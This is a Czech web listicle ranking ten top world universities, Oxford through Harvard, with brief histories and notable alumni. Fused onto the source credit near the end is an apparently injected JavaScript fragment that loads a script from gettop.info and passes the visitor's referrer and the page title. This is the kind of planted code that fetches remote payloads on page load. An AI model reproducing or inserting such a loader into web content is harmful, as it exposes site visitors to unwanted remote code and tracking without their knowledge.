TOP 10: Nejlepší univerzity na světě

Následující článek vám přinese seznam nejlepších univerzit na světě, který vychází z údajů z Centra pro špičkové světové univerzity. Myslím, že nikoho ani nepřekvapí, že na tomto žebříčku nenaleznete žádnou z českých univerzit. Názvy těchto prestižních škol jsou velice známé a s mnohými z nich jste se mohli setkat již v mnoha filmech.

 

10 Oxford – Spojené království

Oxford

Oxford se řadí mezi nejstarší univerzity světa. Hned po Boloni a Sorbonně vznikl právě Oxford. Byl založen v roce 1096 a právem zaujímá místo mezi nejlepšími univerzity na světě. Součástí Oxfordské univerzity je mnoho muzeí a knihoven, které patří mezi jedny nejstarší v celé Anglii. Od založení univerzitu navštívilo mnoho studentů. Od císařů, prezidentů až po držitele Nobelovy ceny, vědce a spisovatele.

 

 

9 Chicagská univerzita – Spojené státy americké

Chicagská univerzita

Tato soukromá americká univerzita nesídlí nikde jinde, než v Chicagu ve státě Illinois. Stojí zde od roku 1890, kdy byla založena Johnem Rockefellerem. Ač se Chicagská univerzita řadí mezi jednu z nejmladších elitních univerzit, dokázali její studenti získat již 89 Nobelových cen.

 

8 Kolumbijská univerzita – Spojené státy americké

Kolumbijská univerzita

Kolumbijská univerzita byla založena v roce 1754 a nachází se v New Yorku. Řadí se také mezi jedny z neprestižnějších univerzit na světě. Tento vzdělávací systém navštěvoval například Barac Obama a Milton Friedman – držitel Nobelovy ceny za ekonomii. Mezi významné osobnosti patřil například i Milan Zelený – americký ekonom českého původu, který zde působil jako profesor.

 

7 Yale – Spojené státy americké

Yale

Tato prestižní soukromá univerzita se nachází v New Havenu v Connecticatu. Tím, že byla založena v roce 1701, se řadí mezi třetí nejstarší vzdělávací systém ve Spojených státech. Každý rok přijme univerzita kolem 7% žádajících studentů. Tato škola má také svého maskota –  a to buldoka a její tradiční barva je modrá. Už od počátku má Yale významného soupeře a to Harvardskou univerzitu. Studoval zde například Bill Clinton, Meryl Streepová Georg Bush a další.

 

6 Princeton – Spojené státy americké

Princeton

Princeton byl založen v roce 1746 původně pod názvem College of New Jersey a až v roce 1756 byla tato univerzita přesunuta do Princetonu a poté byla v roce 1896 přejmenována na Princeton. V USA se jedná o jednu z neprestižnějších univerzit. Tuto soukromou školu navštěvovalo mnoho významných vědců, astronautů a matematiků.

 

5 Cambridge – Velká Británie

Cambridge

Univerzita Cambridge byla založena roku 1209 a jedná se o druhou nejstarší univerzitu v anglicky mluvící části světa. Se vznikem tohoto studijního institutu je spojena zajímá historka. Byla totiž založena akademiky, kteří původně působili na Oxfordské univerzitě, ale po jistých neshodách odešli a založili si svou vlastní univerzitu. Tuto univerzitu navštěvoval například slavný vědec Stephen Hawking.

 

4 Kalifornská univerzita v Berkeley – Spojené státy americké

Kalifornská univerzita

Kalifornská univerzita byla založena v roce 1868 a její studijní systém je považován za jeden z nejlepších systémů, s jakým se můžeme setkat u státních škol. Univerzita je rozmanitá, nabízí 10 fakult a řadí se do třístupňového státního systému vyššího vzdělání.

 

3 Massachusettský technologický institut – Spojené státy americké

Massachusettský technologický institut

Massachusettský technologický institut se řadí mezi další z významných světových univerzit. Nachází se kde jinde, než ve státě Massachusetts. Historie této univerzity sahá od roku 1861, kdy byla založena Williamem Bartonem Rogersem. Tato univerzita nabízí zaměření na strojírenství, ekonomii, lingvistiku, politické vědy a management. Tuto školu vystudovalo mnoho významných osobností, mezi které se řadí mnoho nositelů Nobelovy ceny, astronautů a vědců.

 

2 Stanford – Spojené státy americké

Stanford

Stanford je americká soukromá univerzita, která se nachází v Kalifornii a byla založena v roce 1891. Mezi významné absolventy patří americký spisovatel a nositel Pulitzerovy a Nobelovy ceny John Ernst Steinbeck a z mladší generace například herečka Reese Witherspoon. 

1 Harvard – Spojené státy americké

Harvard

Název této univerzity je odvozen od Johna Harvarda – duchovního, který této škole odkázal svou rozsáhlou knihovnu. Tato univerzita má mnoholetou tradici. Byla založena již v roce 1636 a řadí se tak mezi nejstarší univerzity na světě. Nachází se ve státě Massachusetts a patří mezi jednu z neprestižnějších univerzit světa. Nachází se zde 14 fakult, muzea, galerie, výzkumná střediska a botanické zahrady. Studuje zde přes 20 tisíc studentů, kteří se sem sjíždí z celého světa. Každý rok je přijato pouhých 9 % uchazečů o studium na této univerzitě. Ne každý student si může také tuto univerzitu dovolit. Nejdražší školné se zde pohybuje kolem 40 tisíc americký dolarů za rok. Na Harvardu studovalo 8 amerických prezidentů.

 

Zdroj: list25.coms.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Total
0
Shares
Související články
Dwayne Johnson
Read More

TOP 10: Nejlépe placené filmové hvězdy roku 2021

Žebříček nejlépe placených filmových hvězd je po roce tady. A i když se každý rok na jednotlivé pozice díváme s nadšením a touhou po překvapení, mnohdy jsme spíše zklamaní, protože se na prvních příčkách nachází ti, kteří je okupovali loni. Jak je tomu nyní? Kdo se těší z faktu, že patřil mezi nejlépe placené v roce 2021?
Total
0
Share